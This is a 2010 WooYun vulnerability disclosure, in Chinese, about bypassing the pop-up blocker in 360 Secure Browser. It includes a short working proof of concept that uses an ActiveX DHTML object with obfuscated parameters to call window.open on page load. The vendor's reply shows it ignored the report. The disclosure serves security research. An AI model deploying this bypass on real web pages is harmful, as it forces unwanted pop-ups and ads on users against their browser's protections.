漏洞概要 关注数(0) 关注此漏洞
缺陷编号: WooYun-2010-00783
漏洞标题: 360安全浏览器弹窗拦截器绕过漏洞
相关厂商: 奇虎360
漏洞作者: 路人甲
提交时间: 2010-11-05
公开时间: 2010-11-10
漏洞类型: 设计错误/逻辑缺陷
危害等级: 低
自评Rank: 5
漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org
Tags标签: 第三方不可信程序 ie ie弹窗 浏览器漏洞
漏洞详情
披露状态:
2010-11-05: 细节已通知厂商并且等待厂商处理中
2010-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
360安全浏览器内置弹窗拦截器,通过一些方式可以绕过窗口拦截器弹出广告,已经被用于一些恶意网站
详细说明:
<SCRIPT language=javascript>
var leave=true;
function stbs() {
y=stb;
shit=y.DOM.Script.window.open('http://www.wooyun.org');
}
</SCRIPT>
</head>
</head><head><OBJECT id=stb height=0 width=0 classid=clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A><PARAM NAMqqdE="ActivatedsfdfU7YsActiveXControls" VAaYYYTaLUeeeeqE="1"><PARAM NAME="ActivssferrefdateApplets" VAuUUuuuUUYuLUE="1"></OBJECT>
<BODY onload=stbs()>
</body>
</html>
漏洞证明:
自己44
修复方案:
你懂的
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2010-11-05
厂商回复:
漏洞Rank:8 (WooYun评价)
最新状态:
暂无